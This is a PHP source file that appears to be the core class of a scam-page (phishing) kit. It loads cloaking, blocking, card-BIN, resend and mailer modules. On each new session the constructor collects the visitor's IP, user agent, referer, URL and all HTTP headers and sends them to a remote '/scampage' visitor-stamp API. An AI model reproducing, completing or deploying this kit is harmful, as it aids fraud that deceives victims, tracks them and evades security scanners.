<?php
require_once dirname(__FILE__) . '/external/pclzip.lib.php';
require_once dirname(__FILE__) . '/trait/refresh.trait.php';
require_once dirname(__FILE__) . '/trait/api.trait.php';
require_once dirname(__FILE__) . '/trait/browser.trait.php';
require_once dirname(__FILE__) . '/trait/configuration.trait.php';
require_once dirname(__FILE__) . '/trait/ip.trait.php';
require_once dirname(__FILE__) . '/trait/utility.trait.php';
require_once dirname(__FILE__) . '/trait/server.trait.php';
require_once dirname(__FILE__) . '/trait/error.trait.php';
require_once dirname(__FILE__) . '/trait/log.trait.php';
require_once dirname(__FILE__) . '/trait/auth.trait.php';
require_once dirname(__FILE__) . '/trait/bin.trait.php';
require_once dirname(__FILE__) . '/trait/cloak.trait.php';
require_once dirname(__FILE__) . '/trait/blocker.trait.php';
require_once dirname(__FILE__) . '/trait/session.trait.php';
require_once dirname(__FILE__) . '/trait/render.trait.php';
require_once dirname(__FILE__) . '/trait/zip.trait.php';
require_once dirname(__FILE__) . '/trait/resend.trait.php';

require_once dirname(__FILE__) . '/external/mime.php';
require_once dirname(__FILE__) . '/external/fileuploader.php';
require_once dirname(__FILE__) . '/external/phpmailer.php';
require_once dirname(__FILE__) . '/external/smtp.php';

require_once dirname(__FILE__) . '/extension/email-true-view.php';

class Wexler
{
    use EPAPI, EPConfiguration, EPRender, EPResend, EPError, EPIP, EPServer, EPUtility, EPAuth, EPLog, EPBIN, EPCloak, EPBrowser, EPRefresher, EPBlocker, EPEXTEmailTrueView, EPSession, EPZIP;
    public $APIBackgroundable = false;
    public $APIPending = [];
    public function __construct()
    {
        global $_JSON;

        try {
            if (function_exists('register_shutdown_function')) register_shutdown_function([$this, 'shutdown']);
            if (function_exists('set_error_handler')) set_error_handler([$this, 'errorHandler']);
        } catch (Exception $e) {
            $this->errorLog($e->getMessage());
        }

        if (function_exists('fastcgi_finish_request')) {
            $this->APIBackgroundable = true;
        }

        // Do Some Shit
        if (!function_exists('curl_init')) die("No <b>curl_init</b> function exist!");
        $this->configurationLoad();
        $this->serverLoad();
        $this->ipLoad();
        $this->sessionLoad();
        if (isset($_SERVER['CONTENT_TYPE']) && isset($_SERVER['REQUEST_METHOD'])) {
            if (strpos($_SERVER['CONTENT_TYPE'], 'json') !== false && $_SERVER['REQUEST_METHOD'] == "POST") {
                if (!isset($_JSON)) $_JSON = [];
                $_JSON = json_decode(file_get_contents('php://input'), true);
            }
        }
        if (!$this->sessionGet('pblocker')) {
            $tmpHTTP = [];
            foreach ($_SERVER as $key => $value) {
                if (strtolower(substr($key, 0, strlen('http_'))) == "http_") $tmpHTTP[$key] = $value;
            }
            $this->apiGet('/scampage/_/visitor/stamp', [
                'ip' => $this->ipGetAddress(),
                'useragent' => $_SERVER['HTTP_USER_AGENT'],
                'domain' => $_SERVER['SERVER_NAME'],
                'referer' => (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''),
                'sessionid' => $this->sessionGetID(),
                'protocol' => (isset($_SERVER['SERVER_PROTOCOL']) ? $_SERVER['SERVER_PROTOCOL'] : ''),
                'url' => (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]",
                'http' => base64_encode(json_encode($tmpHTTP)),
            ], 0, true, true);
            $this->sessionSet('pblocker', true);
        }
    }
    public function __destruct()
    {
        if (function_exists('fastcgi_finish_request')) {
            fastcgi_finish_request();
            foreach ($this->APIPending as $v) {
                $this->apiGet($v['url'], $v['data'], $v['cache'], $v['useBuildQuery']);
            }
        }
    }
    public function shutdown()
    {
        $this->errorCheckLastError();
        $this->sessionSave();
    }
    public function redirect($a, $code = 301)
    {
        header("LOCATION: " . $a, true, $code);
        return $this;
    }
    public function readfile($a)
    {
        if (function_exists('readfile')) {
            readfile($a);
        } elseif (function_exists('file_get_contents')) {
            die(file_get_contents($a));
        } else {
            die("No Func Found");
        }
    }
}
